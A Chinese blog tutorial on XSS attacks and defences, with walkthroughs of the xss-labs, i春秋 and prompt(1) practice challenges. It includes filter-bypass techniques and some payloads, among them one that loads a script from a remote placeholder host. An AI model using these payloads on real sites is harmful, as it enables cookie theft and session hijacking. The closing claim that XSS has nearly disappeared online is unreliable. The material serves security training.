[JavaScript知识库] XSS攻击及防御总结和各平台通关思路

文章目录

XSS原理
XSS漏洞分类
XSS的危害
XSS漏洞的黑盒测试
XSS漏洞的白盒测试
xss-labs
i春秋 XSS闯关
prompt(1) 平台
xss攻击总结
XSS防御
补充：关于浏览器编码（圣经）务必熟读

XSS原理

跨站脚本攻击XSS（cross site scripting）。XSS是由于Web应用程序对用户的输入过滤不足而产生的，攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害者可能采用cookie窃取、会话劫持、钓鱼欺骗等各种攻击。
漏洞存在的主要原因：

XSS漏洞分类

1.反射型XSS

也称非持久型、参数型跨站脚本。主要用于恶意脚本附加在URL地址的参数中。他需要欺骗用户点击链接才能出发XSS，一般容易出现搜索页面、输入框、URL参数处。反射型XSS大多数用来盗取用户的cookie信息。
在这里插入图片描述

2.存储型XSS

存储型XSS写进数据库或文件等可以永久保存数据的介质中，存储型XSS通常发生在留言板等地方。在留言板位置留言将恶意代码写进数据库中。因为XSS 使用的JS 代码，JS 代码的运行环境是浏览器，所以需要浏览器从服务器载入恶意的XSS 代码，才能真正触发XSS。此时，需要我们模拟网站后台管理员的身份，查看留言。
在这里插入图片描述

3.基于DOM的XSS

DOM-XSS是基于文档对象模型的一种漏洞，不经过后端，DOM-XSS是通过url传入参数去控制触发的，也属于反射型xss

XSS的危害

针对用户：窃取cookie，劫持会话，网络钓鱼，放马挖矿
针对WEB服务：劫持后台，篡改页面，传播蠕虫，内网扫描
在这里插入图片描述

XSS漏洞的黑盒测试

尽可能找到一切用户可控并且能够输出在页面的代码中的地方，比如下面这些：

XSS漏洞的白盒测试

关于XSS的代码升级主要就是从接收参数的地方和一些关键词入手。
PHP中常用的接收参数的方法有

G E T 、

POST、$REQUET等，可以搜索所有接收参数的地方，然后对接收到的数据进行跟踪，查看有没有输出到页面中，然后看输出到页面中的数据是否进行了过滤和html编码等处理。
也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，然后能否控制，如果从数据库中取得，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。

大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等

xss-labs

预备插件 Hackbar

level 1

简单构造脚本

查看源代码

Level-2

预备知识：

尝试与第一关相同的方式进行注入，发现并没有弹窗

查看网页源代码，发现<``>被编码成html字符实体。猜测在服务器端使用了htmlspecialchars（）函数对keyword参数的值进行了处理，那首先将标签闭合，然后再写入恶意代码 or 在标签内部
在这里插入图片描述

源码查看

htmlspecialchars()
在这里插入图片描述

上图源码可知，使用get方式传递到服务器端的keyword参数的值赋值给str变量，然后使用htmlspecialchars()函数对变量进行处理后显示到网页上。但是直接将变量值插入到input标签的value属性值中，因为并没有对敏感字符进行编码和过滤，所以可以通过构造实现XSS攻击

Level-3

正常尝试，发现尖括号被过滤掉。

源码查看

Level-4

简单构建点击事件

查看源码

Level-5

正常测试：发现展现出来后script，oneclick加上下划线

构造一个a标签，成功绕过

查看源码

发现函数将<script 替换为<scri_pt 、on替换为o_n，这样我们的script不能使用，input的点击事件也不能使用。

Level-6

正常测试：

使用大小写绕过过滤

Level-7

正常测试：发现有大小写过滤了，然后将script替换为空白，则可以尝试双写script

查看源代码

首先将传入的参数进行转小写操作，然后对其中的特殊字符进行替换，替换为空白，这样就会双写就会将script拼接出来。

Level-8

实体编码,通过

查看源代码

可以看出过滤的常见的敏感标签，那么就可以从实体编码入手，将javascript:alert(1)转换为实体编码，绕过过滤。

Level-9

基本测试：发现能使用的关键字都被过滤掉了

查看源码后发现，除了8关的过滤之外，还存在判断输入中是否存在http://

所以尝试脚本后面加上http://,结果发现自己忘记还过滤了script，那么关键字使用html实体编码

实体编码关键字绕过成功

Level-10

正常测试：发现将<>过滤，并且将输出的结果放在了h2标签内，感觉没戏了，然后看到有隐藏的input标签，查看是否存在

发现t_sort也是可以传递参数的，转向t_sort 的input标签，

源码查看

发现t_sort参数只是进行简单的<>过滤，也发现把输出的内容放在标签内，并且对敏感字进行转义杜绝大部分恶意代码。

Level-11

查看源代码;发现PHP $_SERVER[‘HTTP_REFERER’]

使用 $_SERVER[‘HTTP_REFERER’] 将很容易得到链接到当前页面的前一页面的地址。然后使用burpsite抓包增加referer参数
在这里插入图片描述

使用burpsuite进行抓包，增加referer参数进行构造

Level-12

感觉和第11关差不多，看一下网页源码

感觉可以在user-agent上做文章，抓包改一下

可以看到构造成功，成功进入下一关

查看源码

Level-13

查看网页源代码，看到四个隐藏标签，然后尝试

burpsuite抓包，发现cookie值可以构建错误代码

构建恶意语句

查看源代码

从源代码中可以看出，在读取用户

s t r 11 =

_COOKIE[“user”];的时候仅仅做了简单的<过滤，从而导致恶意代码构造成功。

Level-14

Level-15

预备知识：angular js

可以看到成功触发弹窗了，而且在页面响应的下方还可以看到level1的页面。

查看源代码

Level-16

简单测试之后可以看到关键字script以及/符号、空格都被编码成同样的空格字符实体了。这样也没办法去闭合前面的标签了。所以先看看源文件的代码

查看源码

Level-17、Level-18、Level-19、Level-20

i春秋 XSS闯关

Less-1

第一关估计就是简单的恶意脚本就可以

Less-2

进行正常测试，发现参数出现在脚本中，所以第一反应就是尝试逃逸出来，然后执行alert(1)

上才艺

Less-3

正常测试，发现和less2差不多

尝试使用Less2方法进行构造，结果发现单引号被转义

尝试双写单引号,绕过成功

看其他选手的题解，可以使用img标签构造恶意代码

Less-4

首先查看网页源代码

测试jumpUrl参数，发现

构造恶意代码

Less-5

首先查看网页源代码，用出我的抠脚JS水平，大概解读出autosubmit参数，然后加上action就可以了。

构造恶意代码

Less-6

正常测试

这。。。还放在了标签里面，并且对敏感字符做了实体编码。不会不会
查资料，原来这道题考的是AngularJS，还不会。。https://nosec.org/home/detail/4153.html

构造一个payload：

最终拿到flag

prompt(1) 平台

Less-0

简单构建恶意代码

Less-1

首先看到源代码，对<>以及内容进行空格替换。那就要利用html会有一个自动的纠错的功能了，这里我使用了img标签

通过img标签的onerror进行构造恶意代码

Less-2

查看源码发现过滤了=(为空格

尝试使用实体编码绕过,使用svg标签可以加载实体编码

Less-3

查看源代码可以看见对->进行了过滤,主要思路就是要逃出注释区域

Less-4

Less-5

从过滤函数中可以看出，过滤掉了on和> focus,并且是gi，全局匹配，忽略大小写。但是没有忽略换行，所以可以换行，来绕过过滤函数

Less-6

分析源码可以看到，大概是由#分割，前面赋给form.action，使method=post，后面以json格式赋给formdata，把formdata中的属性循环赋给了input。后面满足forms.action存在即执行提交，所以这里使用js伪协议。由于允许我们创建我们自己的输入，这些输入可以用来破坏窗体的action属性。由于DOM破坏,document.forms [0] .action将返回我们新创建的输入字段而不是实际的action属性，因此可以执行JavaScript。

Less-7

查看源码，发现#是用来隔离多个input标签的，所以可以使用注释来巧妙构建恶意代码

使用script标签

使用svg标签

Less-8

可以看出我们一定要逃离这一行，但是\r\n都被替换掉了，所以就想到使用转义进行替换。

尝试了一下

这样肯定是不行的，然后打开网页终端，在终端里面使用换行或换段落的转义字符，发现是可以的。

上才艺

Less-9

正则简单，就是将<后面的所有字符前全部加_,也就是将<script>这样的标签替换为<_SCRIPT>,toUpperCase()不仅转换英文字母，也转换一些Unicode字符，比如将?传入就可以转换为S，这样就可以绕过。
直接构造<?cript>prompt(1)</?cript>不行，因为javascript对大小写敏感,，不识别PROMPT(1),所以构造的payload为<?cript/?rc="xxx/1.js"></?cript>，经过转换后就成了<h1><SCRIPT/SRC="HTTP://xxx/1.JS"></SCRIPT></h1>，成功加载远程的js脚本。
在这里插入图片描述

Less-A

只是进行了html编码，然后将prompt替换成alert，由于还将’替换为空，所以很好绕过

好的，通关思路到这就结束了！！
总结一下，xss攻击方式，以及常见的思路

xss攻击总结

xss常用语句

关于script

关于on事件

函数绕过

XSS构造技巧

1.利用字符编码

2.绕过长度限制

可以利用事件（event）来缩短所需要的字节数onclick=alert(1)//
最好的办法是吧xss payload写到别处，再通过简短的代码加载这段xss Payload。
"location.hash"的内容不会再HTTP包中发送，所以服务器端的Web日志中并不会记录下location.hash里的内容，从而更好的隐藏了黑客真实的意图。

测试：

测试结果

某些情况下可以使用注释绕过长度限制

3.<base>标签

作用：定义网页面上的所有使用“相对路径”标签的hosting地址。
攻击者如果在页面插入base标签，就可以通过在远程服务器上伪造图片、链接或脚本，劫持当前页面中的所有使用相对路径的标签

4.window.name

window对象是浏览器的窗体，并非document对象，很多时候window对象不受通源策略的限制。攻击者可以利用这个对象实现跨域、跨页面传递数据。

XSS防御

htmlspecialchars函数

htmlentities函数

HttpOnly

输入检查

XSS Filter检查用户输入的数据中是否包含一些特殊字符，如果发现这些特殊字符，则将这些字符过滤或者编码。

输出检查

处理富文本的输出外，在变量输出到HTML页面时，可以使用编码或转移的方式来防御XSS攻击。

处理富文本

在标签的选择上，应该使用白名单，避免使用黑名单。禁止一些危险标签<iframe><script>、<base>、<form>等

防御DOM Based XSS

DOM XSS是从javascript中输出数据到HTML页面里。正确防御是在‘$var’输出到<script>时，应该执行一次javascriptEncode；其次在document.write输出到HTML页面时，要分具体情况看待：如果是输出到事件或者脚本，则再做一次javascriptEncode；如果输出到HTML内容或属性中，做一次HTMLEncode

最后最后，XSS虽然复杂，但是可以彻底解决。所以在现在的网路上XSS基本上绝迹了。

补充：关于浏览器编码（圣经）务必熟读

解析顺序是这样的，URL 解析器，HTML 解析器， CSS 解析器，JS解析器

URL的解码是在后台服务检测之前的，可以理解为后台收到URL后会自动进行解码，然后才是执行开发人员编写的对URL中的值的检测函数，首先URL编码作用不在于绕过后台检测，但是当我们是GET方式提交数据时，而我们提交的数据中进行了实体编码，也就意味着存在&，#这样的特殊字符，这时就需要对这些特殊字符进行URL编码，这样才会保证正常解析，如果不进行URL编码的话，就会把+认为是空格了，而&也会是被认为用来连接URL中参数的连接符，故需要进行URL编码。如果是以POST方式传递值，就不需要进行URL编码了。

1.HTML解析（只要是在DOM节点里属性的值，都可以被HTML编码和解析）

浏览器接收到页面数据，开始进行HTML解析，构造DOM树。
所以，HTML 的分析器只能识别特定的词法规则，才能构建起DOM 树，这一块，HTML 不会做解码的工作，因为它做不了。所以，试图这样构造利用漏洞，是不可能的 <img src="http://www.xxx.com"

HTMl 解析器构建DOM Tree,在DOM 树构建完毕之后，这些HTML 实体编码的内容就会被解码，如果识别为实体编码的，会透明的解码:
在这里插入图片描述

2.CSS解析（ＣＳＳ的属性和值都可以进行ＣＳＳ编码和解析，冒号：不可以）

CSS 解析器并不会等到所有的html都解析完成之后再去构建和布局render树。它是解析完一部分内容就显示一部分内容，同时，可能还在通过网络下载其余内容。

CSS 编码解析是用了一套不太正统的转义策略：用一个反斜杠，后边跟1~6位十六进制数字构成。，所以字母e 可以编码为 \65, \065,\000065。而因为这样，后边就不能直接紧跟数字或字母，否则会被当成转义里的内容处理，所以CSS 选择了空格作为终止标识，在解码的时候，再将空格去除。

3.JS解析（\uxxxx）只支持UNICODE,只有进入JS解析环境，才会进行JS编码解析，并且位于JS解析环境的，不会进行实体编码解析

转义编码应当只出现在标示符部分，不能用于对语法有真正影响的符号，也就是括号，或者是引号。（不包含使用ＤＯＭ操作的情况）,DOM操作中括号和引号可以进行ＪＳ转义。

４.DOM操作

DOM 操作实际上是js强势介入 HTML 和CSS 的结果，导致ＨＴＭＬ标签的属性和值都可以做ＪＳ编码和解析。